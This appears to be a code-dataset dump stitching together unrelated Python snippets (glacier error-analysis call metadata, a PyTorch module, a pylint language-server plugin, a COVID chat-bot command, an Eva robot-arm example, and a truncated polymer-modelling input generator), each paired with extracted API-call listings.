+ 1], df_gp.err_dhdt >=\n vec_err_dhdt[i])\n', (21554, 21631), True, 'import numpy as np\n'), ((23920, 24030), 'numpy.logical_and', 'np.logical_and', (['(df_gp.area.values / 1000000 < vec_area[i + 1])', '(df_gp.area.values / 1000000 >= vec_area[i])'], {}), '(df_gp.area.values / 1000000 < vec_area[i + 1], df_gp.area.\n values / 1000000 >= vec_area[i])\n', (23934, 24030), True, 'import numpy as np\n'), ((26210, 26229), 'pandas.read_csv', 'pd.read_csv', (['fn_reg'], {}), '(fn_reg)\n', (26221, 26229), True, 'import pandas as pd\n'), ((26413, 26527), 'numpy.sqrt', 'np.sqrt', (["(df[df.time == '2000-01-01'].err_dh.values[0] ** 2 + df[df.time ==\n '2020-01-01'].err_dh.values[0] ** 2)"], {}), "(df[df.time == '2000-01-01'].err_dh.values[0] ** 2 + df[df.time ==\n '2020-01-01'].err_dh.values[0] ** 2)\n", (26420, 26527), True, 'import numpy as np\n'), ((26556, 26645), 'numpy.sqrt', 'np.sqrt', (['((err_dh * area) ** 2 + (dh * df.perc_err_cont.values[0] / 100.0 * area) ** 2)'], {}), '((err_dh * area) ** 2 + (dh * df.perc_err_cont.values[0] / 100.0 *\n area) ** 2)\n', (26563, 26645), True, 'import numpy as np\n'), ((27169, 27183), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (27181, 27183), True, 'import pandas as pd\n'), ((28058, 28087), 'numpy.nansum', 'np.nansum', (['df_all.area.values'], {}), '(df_all.area.values)\n', (28067, 28087), True, 'import numpy as np\n'), ((28321, 28395), 'numpy.nansum', 'np.nansum', (['(df_all[ind].sq_err_fromdh.values * df_all[ind].area.values ** 2)'], {}), '(df_all[ind].sq_err_fromdh.values * df_all[ind].area.values ** 2)\n', (28330, 28395), True, 'import numpy as np\n'), ((28463, 28539), 'numpy.nansum', 'np.nansum', (['(df_all[ind].sq_err_fromarea.values * df_all[ind].area.values ** 2)'], {}), '(df_all[ind].sq_err_fromarea.values * df_all[ind].area.values ** 2)\n', (28472, 28539), True, 'import numpy as np\n'), ((28610, 28689), 'numpy.nansum', 'np.nansum', (['(df_all[ind].sq_err_fromdensity.values * df_all[ind].area.values ** 2)'], {}), '(df_all[ind].sq_err_fromdensity.values * df_all[ind].area.values ** 2)\n', (28619, 28689), True, 'import numpy as np\n'), ((28747, 28781), 'numpy.nansum', 'np.nansum', (['df_all[ind].area.values'], {}), '(df_all[ind].area.values)\n', (28756, 28781), True, 'import numpy as np\n'), ((30577, 30609), 'matplotlib.ticker.FormatStrFormatter', 'mtick.FormatStrFormatter', (['"""%.0e"""'], {}), "('%.0e')\n", (30601, 30609), True, 'import matplotlib.ticker as mtick\n'), ((4564, 4613), 'numpy.nanmean', 'np.nanmean', (['vgm1.bins.values[0 + i * 5:5 + i * 5]'], {}), '(vgm1.bins.values[0 + i * 5:5 + i * 5])\n', (4574, 4613), True, 'import numpy as np\n'), ((4623, 4671), 'numpy.nanmean', 'np.nanmean', (['vgm1.exp.values[0 + i * 5:5 + i * 5]'], {}), '(vgm1.exp.values[0 + i * 5:5 + i * 5])\n', (4633, 4671), True, 'import numpy as np\n'), ((4993, 5042), 'numpy.nanmean', 'np.nanmean', (['vgm1.bins.values[0 + i * 5:5 + i * 5]'], {}), '(vgm1.bins.values[0 + i * 5:5 + i * 5])\n', (5003, 5042), True, 'import numpy as np\n'), ((5052, 5100), 'numpy.nanmean', 'np.nanmean', (['vgm1.exp.values[0 + i * 5:5 + i * 5]'], {}), '(vgm1.exp.values[0 + i * 5:5 + i * 5])\n', (5062, 5100), True, 'import numpy as np\n'), ((13481, 13497), 'numpy.arange', 'np.arange', (['(3)', '(31)'], {}), '(3, 31)\n', (13490, 13497), True, 'import numpy as np\n'), ((16768, 16785), 'matplotlib.pyplot.cm.Greys', 'plt.cm.Greys', (['(0.8)'], {}), '(0.8)\n', (16780, 16785), True, 'import matplotlib.pyplot as plt\n'), ((16913, 16930), 'matplotlib.pyplot.cm.Greys', 'plt.cm.Greys', (['(0.8)'], {}), '(0.8)\n', (16925, 16930), True, 'import matplotlib.pyplot as plt\n'), ((21860, 21979), 'numpy.sqrt', 'np.sqrt', (['(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0] ** 2 + df_gp[df_gp.rgiid ==\n rgiid].err_dhdt.values[0] ** 2)'], {}), '(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0] ** 2 + df_gp[df_gp.\n rgiid == rgiid].err_dhdt.values[0] ** 2)\n', (21867, 21979), True, 'import numpy as np\n'), ((22390, 22405), 'pybob.ddem_tools.nmad', 'nmad', (['diff_dhdt'], {}), '(diff_dhdt)\n', (22394, 22405), False, 'from pybob.ddem_tools import nmad\n'), ((22431, 22453), 'numpy.nanmedian', 'np.nanmedian', (['err_dhdt'], {}), '(err_dhdt)\n', (22443, 22453), True, 'import numpy as np\n'), ((22474, 22521), 'numpy.mean', 'np.mean', (['(vec_err_dhdt[i + 1], vec_err_dhdt[i])'], {}), '((vec_err_dhdt[i + 1], vec_err_dhdt[i]))\n', (22481, 22521), True, 'import numpy as np\n'), ((24254, 24373), 'numpy.sqrt', 'np.sqrt', (['(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0] ** 2 + df_gp[df_gp.rgiid ==\n rgiid].err_dhdt.values[0] ** 2)'], {}), '(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0] ** 2 + df_gp[df_gp.\n rgiid == rgiid].err_dhdt.values[0] ** 2)\n', (24261, 24373), True, 'import numpy as np\n'), ((24784, 24799), 'pybob.ddem_tools.nmad', 'nmad', (['diff_dhdt'], {}), '(diff_dhdt)\n', (24788, 24799), False, 'from pybob.ddem_tools import nmad\n'), ((24825, 24847), 'numpy.nanmedian', 'np.nanmedian', (['err_dhdt'], {}), '(err_dhdt)\n', (24837, 24847), True, 'import numpy as np\n'), ((24868, 24907), 'numpy.mean', 'np.mean', (['(vec_area[i + 1], vec_area[i])'], {}), '((vec_area[i + 1], vec_area[i]))\n', (24875, 24907), True, 'import numpy as np\n'), ((26138, 26154), 'numpy.arange', 'np.arange', (['(1)', '(20)'], {}), '(1, 20)\n', (26147, 26154), True, 'import numpy as np\n'), ((26768, 26840), 'numpy.sqrt', 'np.sqrt', (['((err_dvol * 0.85 / 10 ** 9) ** 2 + (dvol * 0.06 / 10 ** 9) ** 2)'], {}), '((err_dvol * 0.85 / 10 ** 9) ** 2 + (dvol * 0.06 / 10 ** 9) ** 2)\n', (26775, 26840), True, 'import numpy as np\n'), ((27577, 27629), 'numpy.nansum', 'np.nansum', (['(df_all.dmdtda.values * df_all.area.values)'], {}), '(df_all.dmdtda.values * df_all.area.values)\n', (27586, 27629), True, 'import numpy as np\n'), ((27628, 27657), 'numpy.nansum', 'np.nansum', (['df_all.area.values'], {}), '(df_all.area.values)\n', (27637, 27657), True, 'import numpy as np\n'), ((27684, 27748), 'numpy.nansum', 'np.nansum', (['(df_all.sq_err_fromdh.values * df_all.area.values ** 2)'], {}), '(df_all.sq_err_fromdh.values * df_all.area.values ** 2)\n', (27693, 27748), True, 'import numpy as np\n'), ((27809, 27875), 'numpy.nansum', 'np.nansum', (['(df_all.sq_err_fromarea.values * df_all.area.values ** 2)'], {}), '(df_all.sq_err_fromarea.values * df_all.area.values ** 2)\n', (27818, 27875), True, 'import numpy as np\n'), ((27939, 28008), 'numpy.nansum', 'np.nansum', (['(df_all.sq_err_fromdensity.values * df_all.area.values ** 2)'], {}), '(df_all.sq_err_fromdensity.values * df_all.area.values ** 2)\n', (27948, 28008), True, 'import numpy as np\n'), ((28196, 28258), 'numpy.nansum', 'np.nansum', (['(df_all[ind].dmdtda.values * df_all[ind].area.values)'], {}), '(df_all[ind].dmdtda.values * df_all[ind].area.values)\n', (28205, 28258), True, 'import numpy as np\n'), ((28257, 28291), 'numpy.nansum', 'np.nansum', (['df_all[ind].area.values'], {}), '(df_all[ind].area.values)\n', (28266, 28291), True, 'import numpy as np\n'), ((28395, 28429), 'numpy.nansum', 'np.nansum', (['df_all[ind].area.values'], {}), '(df_all[ind].area.values)\n', (28404, 28429), True, 'import numpy as np\n'), ((28539, 28573), 'numpy.nansum', 'np.nansum', (['df_all[ind].area.values'], {}), '(df_all[ind].area.values)\n', (28548, 28573), True, 'import numpy as np\n'), ((28689, 28723), 'numpy.nansum', 'np.nansum', (['df_all[ind].area.values'], {}), '(df_all[ind].area.values)\n', (28698, 28723), True, 'import numpy as np\n'), ((31626, 31658), 'matplotlib.ticker.FormatStrFormatter', 'mtick.FormatStrFormatter', (['"""%.0e"""'], {}), "('%.0e')\n", (31650, 31658), True, 'import matplotlib.ticker as mtick\n'), ((2225, 2257), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[1:2]'], {}), '(df_c.exp.values[1:2])\n', (2235, 2257), True, 'import numpy as np\n'), ((2297, 2334), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[1:2]"], {}), "(df_c['count'].values[1:2])\n", (2307, 2334), True, 'import numpy as np\n'), ((2375, 2419), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[20 - 10:20 + 10]'], {}), '(df_c.exp.values[20 - 10:20 + 10])\n', (2385, 2419), True, 'import numpy as np\n'), ((2462, 2511), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[20 - 10:20 + 10]"], {}), "(df_c['count'].values[20 - 10:20 + 10])\n", (2472, 2511), True, 'import numpy as np\n'), ((2552, 2596), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[50 - 10:50 + 10]'], {}), '(df_c.exp.values[50 - 10:50 + 10])\n', (2562, 2596), True, 'import numpy as np\n'), ((2639, 2688), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[50 - 10:50 + 10]"], {}), "(df_c['count'].values[50 - 10:50 + 10])\n", (2649, 2688), True, 'import numpy as np\n'), ((5385, 5415), 'numpy.arange', 'np.arange', (['(30000)', '(3000000)', '(100)'], {}), '(30000, 3000000, 100)\n', (5394, 5415), True, 'import numpy as np\n'), ((10001, 10014), 'numpy.array', 'np.array', (['dts'], {}), '(dts)\n', (10009, 10014), True, 'import numpy as np\n'), ((19545, 19565), 'numpy.array', 'np.array', (['list_area2'], {}), '(list_area2)\n', (19553, 19565), True, 'import numpy as np\n'), ((22539, 22557), 'numpy.nansum', 'np.nansum', (['ci_size'], {}), '(ci_size)\n', (22548, 22557), True, 'import numpy as np\n'), ((24925, 24943), 'numpy.nansum', 'np.nansum', (['ci_size'], {}), '(ci_size)\n', (24934, 24943), True, 'import numpy as np\n'), ((27748, 27777), 'numpy.nansum', 'np.nansum', (['df_all.area.values'], {}), '(df_all.area.values)\n', (27757, 27777), True, 'import numpy as np\n'), ((27875, 27904), 'numpy.nansum', 'np.nansum', (['df_all.area.values'], {}), '(df_all.area.values)\n', (27884, 27904), True, 'import numpy as np\n'), ((28008, 28037), 'numpy.nansum', 'np.nansum', (['df_all.area.values'], {}), '(df_all.area.values)\n', (28017, 28037), True, 'import numpy as np\n'), ((29623, 29643), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (29631, 29643), True, 'import numpy as np\n'), ((29719, 29739), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (29727, 29739), True, 'import numpy as np\n'), ((29818, 29838), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (29826, 29838), True, 'import numpy as np\n'), ((30474, 30494), 'numpy.arange', 'np.arange', (['(1.5)', '(20.5)'], {}), '(1.5, 20.5)\n', (30483, 30494), True, 'import numpy as np\n'), ((31181, 31201), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (31189, 31201), True, 'import numpy as np\n'), ((31277, 31297), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (31285, 31297), True, 'import numpy as np\n'), ((31376, 31396), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (31384, 31396), True, 'import numpy as np\n'), ((2757, 2800), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[20 - 5:20 + 20]'], {}), '(df_c.exp.values[20 - 5:20 + 20])\n', (2767, 2800), True, 'import numpy as np\n'), ((2836, 2885), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[20 - 10:20 + 10]"], {}), "(df_c['count'].values[20 - 10:20 + 10])\n", (2846, 2885), True, 'import numpy as np\n'), ((2919, 2963), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[50 - 10:50 + 10]'], {}), '(df_c.exp.values[50 - 10:50 + 10])\n', (2929, 2963), True, 'import numpy as np\n'), ((2999, 3048), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[50 - 10:50 + 10]"], {}), "(df_c['count'].values[50 - 10:50 + 10])\n", (3009, 3048), True, 'import numpy as np\n'), ((5324, 5345), 'numpy.arange', 'np.arange', (['(0)', '(3000)', '(1)'], {}), '(0, 3000, 1)\n', (5333, 5345), True, 'import numpy as np\n'), ((5352, 5378), 'numpy.arange', 'np.arange', (['(3000)', '(30000)', '(10)'], {}), '(3000, 30000, 10)\n', (5361, 5378), True, 'import numpy as np\n'), ((10016, 10039), 'numpy.isnan', 'np.isnan', (['arr_res[:, i]'], {}), '(arr_res[:, i])\n', (10024, 10039), True, 'import numpy as np\n'), ((14350, 14386), 'numpy.nansum', 'np.nansum', (['(err_corr[:, k] * nsamp_dt)'], {}), '(err_corr[:, k] * nsamp_dt)\n', (14359, 14386), True, 'import numpy as np\n'), ((14389, 14408), 'numpy.nansum', 'np.nansum', (['nsamp_dt'], {}), '(nsamp_dt)\n', (14398, 14408), True, 'import numpy as np\n'), ((14723, 14789), 'pyddem.volint_tools.neff_circ', 'neff_circ', (['area', "[(tmp_length, 'Sph', final_num_err_corr[k] ** 2)]"], {}), "(area, [(tmp_length, 'Sph', final_num_err_corr[k] ** 2)])\n", (14732, 14789), False, 'from pyddem.volint_tools import neff_circ, std_err\n'), ((15422, 15442), 'numpy.array', 'np.array', (['list_areas'], {}), '(list_areas)\n', (15430, 15442), True, 'import numpy as np\n'), ((15561, 15581), 'numpy.array', 'np.array', (['list_areas'], {}), '(list_areas)\n', (15569, 15581), True, 'import numpy as np\n'), ((19497, 19512), 'numpy.array', 'np.array', (['diff2'], {}), '(diff2)\n', (19505, 19512), True, 'import numpy as np\n'), ((19513, 19533), 'numpy.array', 'np.array', (['list_area2'], {}), '(list_area2)\n', (19521, 19533), True, 'import numpy as np\n'), ((22236, 22250), 'numpy.isnan', 'np.isnan', (['diff'], {}), '(diff)\n', (22244, 22250), True, 'import numpy as np\n'), ((22632, 22649), 'numpy.isnan', 'np.isnan', (['ci_size'], {}), '(ci_size)\n', (22640, 22649), True, 'import numpy as np\n'), ((24630, 24644), 'numpy.isnan', 'np.isnan', (['diff'], {}), '(diff)\n', (24638, 24644), True, 'import numpy as np\n'), ((25018, 25035), 'numpy.isnan', 'np.isnan', (['ci_size'], {}), '(ci_size)\n', (25026, 25035), True, 'import numpy as np\n'), ((3114, 3158), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[20 - 10:20 + 30]'], {}), '(df_c.exp.values[20 - 10:20 + 30])\n', (3124, 3158), True, 'import numpy as np\n'), ((3194, 3243), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[20 - 10:20 + 30]"], {}), "(df_c['count'].values[20 - 10:20 + 30])\n", (3204, 3243), True, 'import numpy as np\n'), ((3277, 3321), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[50 - 40:50 + 40]'], {}), '(df_c.exp.values[50 - 40:50 + 40])\n', (3287, 3321), True, 'import numpy as np\n'), ((3357, 3406), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[50 - 40:50 + 40]"], {}), "(df_c['count'].values[50 - 40:50 + 40])\n", (3367, 3406), True, 'import numpy as np\n'), ((10064, 10087), 'numpy.isnan', 'np.isnan', (['arr_res[:, i]'], {}), '(arr_res[:, i])\n', (10072, 10087), True, 'import numpy as np\n'), ((10350, 10382), 'numpy.sin', 'np.sin', (['(x / 365.2224 * 2 * np.pi)'], {}), '(x / 365.2224 * 2 * np.pi)\n', (10356, 10382), True, 'import numpy as np\n'), ((10426, 10458), 'numpy.sin', 'np.sin', (['(x / 365.2224 * 2 * np.pi)'], {}), '(x / 365.2224 * 2 * np.pi)\n', (10432, 10458), True, 'import numpy as np\n'), ((10464, 10496), 'numpy.sin', 'np.sin', (['(x / 365.2224 * 2 * np.pi)'], {}), '(x / 365.2224 * 2 * np.pi)\n', (10470, 10496), True, 'import numpy as np\n'), ((22036, 22048), 'numpy.abs', 'np.abs', (['diff'], {}), '(diff)\n', (22042, 22048), True, 'import numpy as np\n'), ((22116, 22170), 'numpy.abs', 'np.abs', (['df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]'], {}), '(df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0])\n', (22122, 22170), True, 'import numpy as np\n'), ((22576, 22593), 'numpy.isnan', 'np.isnan', (['ci_size'], {}), '(ci_size)\n', (22584, 22593), True, 'import numpy as np\n'), ((22938, 22967), 'numpy.round', 'np.round', (['(nb_95ci[i] * 100)', '(0)'], {}), '(nb_95ci[i] * 100, 0)\n', (22946, 22967), True, 'import numpy as np\n'), ((24430, 24442), 'numpy.abs', 'np.abs', (['diff'], {}), '(diff)\n', (24436, 24442), True, 'import numpy as np\n'), ((24510, 24564), 'numpy.abs', 'np.abs', (['df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]'], {}), '(df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0])\n', (24516, 24564), True, 'import numpy as np\n'), ((24962, 24979), 'numpy.isnan', 'np.isnan', (['ci_size'], {}), '(ci_size)\n', (24970, 24979), True, 'import numpy as np\n'), ((25228, 25257), 'numpy.round', 'np.round', (['(nb_95ci[i] * 100)', '(0)'], {}), '(nb_95ci[i] * 100, 0)\n', (25236, 25257), True, 'import numpy as np\n'), ((22055, 22109), 'numpy.abs', 'np.abs', (['df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]'], {}), '(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0])\n', (22061, 22109), True, 'import numpy as np\n'), ((24449, 24503), 'numpy.abs', 'np.abs', (['df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]'], {}), '(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0])\n', (24455, 24503), True, 'import numpy as np\n'), ((19260, 19277), 'numpy.nanmean', 'np.nanmean', (['diff2'], {}), '(diff2)\n', (19270, 19277), True, 'import numpy as np\n'), ((19305, 19316), 'pybob.ddem_tools.nmad', 'nmad', (['diff2'], {}), '(diff2)\n', (19309, 19316), False, 'from pybob.ddem_tools import nmad\n')]
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class Message(nn.Module):
def __init__(self, d_model1, d_model2):
super().__init__()
self.fc_gate1 = nn.Linear(d_model1, d_model2, bias=False)
self.fc_gate2 = nn.Linear(d_model1, d_model2, bias=False)
#self.fc_gate1 = nn.Conv1d(d_model1, d_model2, kernel_size = 1, bias=False)
#self.fc_gate2 = nn.Conv1d(d_model2, d_model2, kernel_size = 1, bias=False)
#self.bn1 = nn.BatchNorm1d(d_model2)
#self.bn2 = nn.BatchNorm1d(d_model2)
#self.re1 = nn.ReLU()
#self.re2 = nn.ReLU()
def forward(self, x1):
g1 = self.fc_gate1(x1)
#g1 = self.re1(self.bn1(self.fc_gate1(x1)))
#g2 = self.re2(self.bn2(self.fc_gate2(g1)))
return g1
|
[
"torch.nn.Linear"
] |
[((190, 231), 'torch.nn.Linear', 'nn.Linear', (['d_model1', 'd_model2'], {'bias': '(False)'}), '(d_model1, d_model2, bias=False)\n', (199, 231), True, 'import torch.nn as nn\n'), ((256, 297), 'torch.nn.Linear', 'nn.Linear', (['d_model1', 'd_model2'], {'bias': '(False)'}), '(d_model1, d_model2, bias=False)\n', (265, 297), True, 'import torch.nn as nn\n')]
|
# Copyright 2018 SUSE, Inc.
import os
import logging
import pylint.config
import pylint.lint
import pylint.reporters
from pyls import hookimpl, lsp
log = logging.getLogger(__name__)
@hookimpl
def pyls_lint(config, document, on_change):
settings = config.plugin_settings('pylint')
log.debug("Got pylint settings: %s", settings)
collector = DiagCollector()
if not on_change:
log.debug('Running pylint on \'%s\' in \'%s\'', document.path, os.getcwd())
pylint.lint.Run(args=[document.path], reporter=collector, exit=False)
return [map_diagnostic(diag, document.lines) for diag in collector.messages]
class DiagCollector(pylint.reporters.CollectingReporter):
def display_reports(self, layout):
"""do nothing"""
def _display(self, layout):
"""do nothing"""
def map_diagnostic(message, lines):
severity = lsp.DiagnosticSeverity.Warning
if message.category in ['fatal', 'error']:
severity = lsp.DiagnosticSeverity.Error
# LSP lines start at 0, while pylint starts at 1
err_range = {
'start': {'line': message.line - 1, 'character': message.column},
'end': {
# FIXME: It's a little naive to mark until the end of the line, can we not easily do better?
'line': message.line - 1,
'character': len(lines[message.line - 1]) - 1
},
}
return {
'source': 'pylint',
'range': err_range,
'message': message.msg.split('\n')[0],
'code': message.symbol,
'severity': severity
}
|
[
"os.getcwd",
"logging.getLogger"
] |
[((155, 182), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (172, 182), False, 'import logging\n'), ((464, 475), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (473, 475), False, 'import os\n')]
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
# Port to UserBot by @MoveAngel
from covid import Covid
from userbot import CMD_HELP
from userbot.events import register
@register(outgoing=True, pattern=r"^\.covid(?: |$)(.*)")
async def corona(event):
await event.edit("`Processing...`")
query = event.pattern_match.group(1)
country = query or "world"
covid = Covid(source="worldometers")
try:
country_data = covid.get_status_by_country_name(country)
output_text = (
f"`Confirmed : {format_integer(country_data['confirmed'])}`\n" +
f"`Active : {format_integer(country_data['active'])}`\n" +
f"`Deaths : {format_integer(country_data['deaths'])}`\n" +
f"`Recovered : {format_integer(country_data['recovered'])}`\n\n" +
f"`New Cases : {format_integer(country_data['new_cases'])}`\n" +
f"`New Deaths : {format_integer(country_data['new_deaths'])}`\n" +
f"`Critical : {format_integer(country_data['critical'])}`\n" +
f"`Total Tests : {format_integer(country_data['total_tests'])}`\n\n" +
f"Data provided by [Worldometer](https://www.worldometers.info/coronavirus/country/{country})")
await event.edit(f"Corona Virus Info in {country}:\n\n{output_text}")
except ValueError:
await event.edit(f"No information found for: {country}!")
def format_integer(number, thousand_separator="."):
def reverse(string):
string = "".join(reversed(string))
return string
s = reverse(str(number))
count = 0
result = ""
for char in s:
count = count + 1
if count % 3 == 0:
if len(s) == count:
result = char + result
else:
result = thousand_separator + char + result
else:
result = char + result
return result
CMD_HELP.update({
"covid":
".covid <country>"
"\nUsage: Get an information about data covid-19 in your country."
})
|
[
"userbot.CMD_HELP.update",
"covid.Covid",
"userbot.events.register"
] |
[((326, 381), 'userbot.events.register', 'register', ([], {'outgoing': '(True)', 'pattern': '"""^\\\\.covid(?: |$)(.*)"""'}), "(outgoing=True, pattern='^\\\\.covid(?: |$)(.*)')\n", (334, 381), False, 'from userbot.events import register\n'), ((2059, 2181), 'userbot.CMD_HELP.update', 'CMD_HELP.update', (['{\'covid\':\n """.covid <country>\nUsage: Get an information about data covid-19 in your country."""\n }'], {}), '({\'covid\':\n """.covid <country>\nUsage: Get an information about data covid-19 in your country."""\n })\n', (2074, 2181), False, 'from userbot import CMD_HELP\n'), ((531, 559), 'covid.Covid', 'Covid', ([], {'source': '"""worldometers"""'}), "(source='worldometers')\n", (536, 559), False, 'from covid import Covid\n')]
|
#!/usr/bin/env python3
from automata.Eva import Eva
import time
import json
import logging
# This example shows usage of the Eva object, used for controlling Eva,
# reading Eva's current state and responding to different events triggered
# by Eva's operation.
host_ip = input("Please enter a Eva IP: ")
token = input("Please enter a valid Eva token: ")
eva = Eva(host_ip, token)
# Send Eva to a waypoint
with eva.lock():
eva.control_wait_for_ready()
eva.control_go_to([0, 0, 0, 0, 0, 0])
# Print Eva's toolpaths
toolpaths = eva.toolpaths_list()
outToolpaths = []
for toolpathItem in toolpaths:
toolpath = eva.toolpaths_retrieve(toolpathItem['id'])
outToolpaths.append(toolpath)
print(json.dumps(outToolpaths))
# Create a basic toolpath and execute it
toolpath = {
"metadata":{
"default_velocity":0.7,
"next_label_id":5,
"analog_modes":{ "i0":"voltage", "i1":"voltage", "o0":"voltage", "o1":"voltage" }
},
"waypoints":[
{ "joints":[-0.68147224, 0.3648368, -1.0703622, 9.354615e-05, -2.4358354, -0.6813218], "label_id":3 },
{ "joints":[-0.6350288, 0.25192022, -1.0664424, 0.030407501, -2.2955494, -0.615318], "label_id":2 },
{ "joints":[-0.13414459, 0.5361486, -1.280493, -6.992453e-08, -2.3972468, -0.13414553], "label_id":1 },
{ "joints":[-0.4103904, 0.33332264, -1.5417944, -5.380291e-06, -1.9328799, -0.41031334], "label_id":4 }
],
"timeline":[
{ "type":"home", "waypoint_id":2 },
{ "type":"trajectory", "trajectory":"joint_space", "waypoint_id":1 },
{ "type":"trajectory", "trajectory":"joint_space", "waypoint_id":0 },
{ "type":"trajectory", "trajectory":"joint_space", "waypoint_id":2 }
]
}
with eva.lock():
eva.control_wait_for_ready()
eva.toolpaths_use(toolpath)
eva.control_home()
eva.control_run(loop=1)
|
[
"automata.Eva.Eva",
"json.dumps"
] |
[((364, 383), 'automata.Eva.Eva', 'Eva', (['host_ip', 'token'], {}), '(host_ip, token)\n', (367, 383), False, 'from automata.Eva import Eva\n'), ((707, 731), 'json.dumps', 'json.dumps', (['outToolpaths'], {}), '(outToolpaths)\n', (717, 731), False, 'import json\n')]
|
"""
Functions for manipulating Polymer Modeler files.
"""
from polymerxtal.polymod import main, readPDB
from .validate import validate_bonds, readbond
def generate_polymod_input(polymer_custom_input):
polymer_custom_output = polymer_custom_input + "_latch.in"
polymer_type_custom = {}
src = open(polymer_custom_input)
des = open(polymer_custom_output, "w")
des.write("#\n")
des.write("\n")
des.write("# You shouldn't need this line if you build PolymerModeler\n")
des.write("data_dir latch #/home/ben/work/PolymerModeler/src/latch/data\n")
des.write("\n")
des.write("# Use this scale to extend VdW radii when searching for bonds\n")
des.write("bond_scale 1.2 \n")
des.write("\n")
des.write("# Temperature (K)\n")
des.write("temperature 300\n")
des.write("\n")
des.write("# Make bonds of this length (in Angstroms) along the backbone\n")
des.write("backbone_bond_length 1.53\n")
des.write("\n")
des.write(
"# Atoms connected by fewer than this many bonds do NOT feel pair interactions\n"
)
des.write("bond_cutoff 4\n")
des.write("\n")
num_monomer = 0
num_chain = 0
polymer_type_custom["num_monomer"] = 0
polymer_type_custom["num_chain"] = 0
for line in src.readlines():
valid_line = line.split("#")[0]
ln = valid_line.split()
if len(ln) < 1:
continue
if ln[0] == "monomer_type":
if len(ln) > 1:
polymer_type_custom["num_monomer"] = int(ln[1])
if polymer_type_custom["num_monomer"] < 1:
print(
"Please specify a positive number of custom monomer types you wish to build"
)
return False
else:
print(
"Please specify a positive number of custom monomer types you wish to build"
)
return False
if ln[0] == "monomer":
if "monomer" not in polymer_type_custom:
polymer_type_custom["monomer"] = {}
num_monomer += 1
if num_monomer <= polymer_type_custom["num_monomer"]:
polymer_type_custom["monomer"][num_monomer] = {}
if len(ln[1:]) == 3:
polymer_type_custom["monomer"][num_monomer]["info"] = ln[1:]
if not os.path.exists("../" + ln[1]):
print("Could not find monomer PDB File %s" % ln[1])
return False
elif int(ln[2]) == int(ln[3]):
print(
"Monomer tail atom should not be the same with the head atom"
)
return False
else:
des.write("#monomer: name PDB head tail\n")
des.write(
"monomer m%d ../%s %d %d\n"
% (num_monomer, ln[1], int(ln[2]), int(ln[3]))
)
des.write("\n")
des.write(
"# Let all backbone torsions rotate when monomer m1 is used in a chain\n"
)
des.write("torsion all free \n")
des.write("\n")
else:
print(
"Please specify monomer %d information with monomer PDB file, head atom & tail atom"
% num_monomer
)
return False
else:
print("More monomer input than specified, Please change accordingly")
return False
if ln[0] == "torsion":
if "torsion" not in polymer_type_custom["monomer"][num_monomer]:
polymer_type_custom["monomer"][num_monomer]["torsion"] = {}
if len(ln) > 2:
polymer_type_custom["monomer"][num_monomer]["torsion"][ln[1]] = ln[2:]
if int(ln[2]) < 0 or int(ln[2]) > 3:
print("Please specify backbone torsion angle probabilities type")
print(
"Starting with backbone atom 3, specify whether the torsion should change, and, if so, how."
)
print("Values for specification:")
print(" 0: no change")
print(" 1: uniform probability for all angles")
print(" 2: energy levels associated with specific angless")
print(" 3: probability associated with specific angles")
return False
elif int(ln[2]) == 2 or int(ln[2]) == 3:
if len(ln) > 3:
if not os.path.exists("../" + ln[3]):
print("Could not find file %s" % ln[3])
return False
elif int(ln[2]) == 2:
print(
"Please specify file for energy levels associated with specific angles"
)
return False
elif int(ln[2]) == 3:
print(
"Please specify file for probability associated with specific angles"
)
return False
else:
print("Please specify backbone torsion angle probabilities information")
return False
if ln[0] == "chain_stereo":
if len(ln) > 1:
polymer_type_custom["num_chain"] = int(ln[1])
if polymer_type_custom["num_chain"] < 1:
print(
"Please specify a positive number of custom polymer chain types you wish to build"
)
return False
elif len(ln[2:]) == 2 * polymer_type_custom["num_chain"]:
if "chain" not in polymer_type_custom:
polymer_type_custom["chain"] = {}
for i in range(polymer_type_custom["num_chain"]):
if int(ln[2 * i + 2]) not in polymer_type_custom["chain"]:
polymer_type_custom["chain"][int(ln[2 * i + 2])] = {}
polymer_type_custom["chain"][int(ln[2 * i + 2])][
"probability"
] = eval(ln[2 * i + 3])
else:
print(
"Please specify Distribution of %d chain types"
% polymer_type_custom["num_chain"]
)
return False
else:
print(
